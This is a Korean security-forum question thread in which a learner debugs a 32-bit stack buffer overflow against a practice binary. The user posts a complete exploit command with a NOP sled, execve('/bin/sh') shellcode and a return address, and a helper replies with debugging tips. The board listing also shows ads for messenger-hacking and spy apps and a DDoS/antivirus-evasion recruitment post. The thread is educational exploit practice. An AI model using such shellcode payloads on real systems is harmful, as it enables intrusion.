시스템 해킹

1574,

8/79

vngkv123

64비트 bof관련질문

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1836 [복사]

64비트에서 32비트컴파일한 파일에 간단한 bof를 할려는데 aslr이나 nx같은건 전혀 안걸려있어요. 버퍼에 쉘코드를 넣고 리턴주소를 버퍼시작주소로 두고 하는데 전혀 먹히질않네요 ㅠ

궁금한게 이럴 때 32비트쉘코드를 쓰니요 64비트를 쓰나요. 그리고 스택첫주소가 32비트컴파일 시 0xff로 시작하던데 \xff가 문제가되나요??

Hit : 2640 Date : 2017/03/28 09:01


해쿨러	32비트 쉘코드 쓰구요 0xff로 시작하는것도 문제가 안됩니다 aslr과 nx가 모두 없는게 아닐 수 있는데 cat /proc/sys/kernel/randomize_va_space 했을 때 0이 나와야 하고 http://www.trapkit.de/tools/checksec.html 이걸로 checksec.sh --file ./binary 했을 때 NX Disabled가 나와야 합니다	2017/03/28
vngkv123	0x0804850a <+47>: lea eax,[ebp-0x48] 0x0804850d <+50>: push eax 0x0804850e <+51>: call 0x8048380 <strcpy@plt> 이렇게 72바이트 + 4바이트 sfp + 4바이트 ret이 있는데.. 0xffffd560: 0x41414141 버퍼의 시작주소가 이렇고 페1이로드를 ./exploitme `python -c 'print"\x90"27+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x90"26+"\x60\xd5\xff\xff"'` 23바이트 쉘코드를 써서 넣었는데 안되네용 ㅠ checksec.sh이랑 aslr체크시 NX랑 메모리랜덤화는 없었어영	2017/03/28
해쿨러	일단 또 전형적인 문제로 보이는데 exploitme를 상대경로가 아닌 절대경로로 넣고 실행해보세요 그리고 버퍼 시작주소를 gdb로 프로그램을 실행시켜서 찾지 마시고 eip를 0x41414141로 변조시켜 코어파일을 만들고 나서 확인해보세요	2017/03/29

1434

고수님들께 질문합니다.[2]

pwnnnt

03/30

2210

64비트 bof관련질문[3]

vngkv123

03/28

2639

1432

ROP GOT overwrite의 strcpy질문.. lob fedora hell_fire[6]

vngkv123

03/26

2330

1431

RTL기법 질문[6]

vngkv123

03/23

2307

1430

도와주세요 대학교수님들한테 물어봐도 이상하게 답변해주세요 ㅠ.[1]

morieye

03/14

2240

1429

라이브러리파일 사용[1]

exqa123

02/05

2586

1428

FC10 1번문제

exqa123

01/24

2304

1427

shellcode 질문드립니다.[1]

bong93

01/07

2191

1426

socat, 디버깅[3]

choboKing

12/31

2450

1425

32비트 리눅스 매직가젯[2]

choboKing

12/31

3697

1424

peda context view 오류[2]

choboKing

12/22

2829

1423

라이브러리 함수의 주소가 이상해요[codegate2014 nuclear][4]

choboKing

12/17

2995

1422

__libc_start_main에 대해 여쭤봅니다.[2]

choboKing

12/14

2732

1421

쉘 코드를 배우고싶은데 어떤지식이있어야하나요?[4]

morieye

12/14

2402

1420

카톡 페톡 해킹,카톡내역조회,카톡해킹,삭제한카톡내역복구,스파이앱,

wlslwlstm

11/25

3505

1419

공유라이브러리에 대해 여쭤봅니다.

iwonderhow

10/07

2372

1418

악성코드 분석...[1]

dreadlo

09/27

2876

1417

dll인젝션이 왜 안되는 걸까요....

wlgns5721

08/30

2745

1416

해킹/디도스/백신우회쪽 같이 연구하시면서 성장하실분 구합니다. 지식없어도됨 [2]

yoyo1234

08/21

3230

1415

휴대폰 해킹(?) 이거 어떤 해킹 인가요?[1]

ks610126

07/17

2937

[1][2][3][4][5][6][7] 8 [9][10]..[79]